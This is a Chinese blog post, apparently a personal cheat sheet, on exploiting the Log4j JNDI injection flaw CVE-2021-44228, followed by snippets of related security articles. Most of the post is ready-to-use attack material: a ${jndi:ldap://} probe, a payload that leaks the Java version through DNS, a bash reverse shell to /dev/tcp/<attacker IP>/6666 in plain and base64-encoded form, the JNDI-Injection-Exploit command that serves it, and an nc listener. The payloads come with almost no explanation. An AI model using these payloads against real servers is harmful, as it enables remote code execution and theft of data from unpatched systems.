log4j-jndi注入(CVE-2021-44228)

最新推荐文章于 2024-09-12 14:33:31 发布
最新推荐文章于 2024-09-12 14:33:31 发布
阅读量506 收藏 7
点赞数 7
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55885866/article/details/135563893
版权

jndi测试payload:
${jndi:ldap://dnslog子域名}

查看dnslog:

外带数据:

action=${jndi:ldap://${sys:java.version}2c8ae29154.ipv6.1433.eu.org.}

getshell:

Runtime.exec Payload Generater | AresX's Blog

bash -i >& /dev/tcp/攻击机器ip/6666 0>&1

进行编码:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "攻击机器ip"

监听本地端口:
nc -lvvp 6666

hzyyyyyyyu
关注
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1474
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
CVE-2021-44228 Log4j 复现及原理
weixin_45260839的博客
05-08 2123
CVE-2021-44228 Log4j 复现及原理
log4j jndi注入漏洞
Ye的博客
04-06 1213
JNDI、LDAP、log for java: log4j Java程序日志监控组件
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
我了解豹女就像农民伯伯了解大米
03-17 6100
Log4j2端口3839页面 http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1 去提交dnslog payload参数: http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn} Dnslog中检测到信息,.
DNSlog盲注
weixin_30251587的博客
03-09 683
前言 在渗透测试中,经常遇到如下情景:   1,sql盲注   2,blind型ssrf以及xxe   3,无回显命令执行漏洞 ... dnslog盲注原理 开放的DNSlog平台: http://ceye.io/ 在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。 域名解析的过程,是由顶级域名向下逐级...
【漏洞复现】2,网络安全开发知识点
m0_61331237的博客
04-09 983
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
MSSQL站库分离注入绕过WDF提权
潇湘信安的博客
05-09 749
项目中遇到这样一个场景:MSSQL后台登录框注入,支持xp_cmdshell组件,站库分离(可出网),普通权限nt service\mssqlserver,但存在Defender杀软,暂时没法上线和提权。
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
提到的"避免log4j漏洞问题"可能指的是在2021年出现的严重安全漏洞——CVE-2021-44228,也被称为Log4Shell。这个漏洞允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码。...
Log4j2的JNDI注入漏洞(CVE-2021-44228
黑白的博客
10-13 6419
好好学习,天天向上。
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6120
log4j 漏洞CVE-2021-44228 漏洞复现
log4j JNDI注入漏洞复现 CVE-2021-44228
最新发布
m0_62284238的博客
09-12 396
{sys:java.version}.example.com,而又会解析到sys协议,获取到java.version参数,然后将这个参数值作为子域名的一部分去访问子域名。会通过jndi的lookup()解析dns://${sys:java.version}.example.com,解析到dns协议,会去访问。log4j提供了${}解析功能,当遇到${}时,会通过JNDI的lookup()解析其中的内容。如${jndi:dns://${sys:java.version}.example.com}
SQL注入经验方法总结
太阳照耀我走四方
07-02 1589
SQL注入经验方法总结
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2538
创新蓝队-针对DNSlog数据外带攻击的应急与预防
JAVA安全之Fastjson反序列化漏洞原理及复现
shelter1234567的博客
10-31 910
本次测试利用fastjson反序列化漏洞,让目标主机执行命令反弹shell。
【漏洞复现】2,轻松拿到了阿里网络安全高级开发工程师的offer
2401_84240554的博客
04-11 816
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
【网络安全】Log4j 远程代码执行漏洞解析
程序员若风的博客
12-25 1201
log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
Apache Log4j 漏洞(JNDI注入 CVE-2021-44228
热门推荐
小龙在线
12-10 3万+
影响范围 2.0 <= Apache log4j <= 2.14.1 利用 import org.apache.log4j.Logger; import java.io.*; import java.sql.SQLException; import java.util.*; public class VulnerableLog4jExampleHandler implements HttpHandler { static Logger log = Logger.getLogger(l
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3191
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j高危漏洞原理及复现
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及复现 漏洞检测||复现环境 查看JDK版本,发现版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发现版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发现存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
log4j2 JNDI注入复现
qq_20504373的博客
12-14 6503
复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个post curl -X POST -F “payload=${jndi:ldap://
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值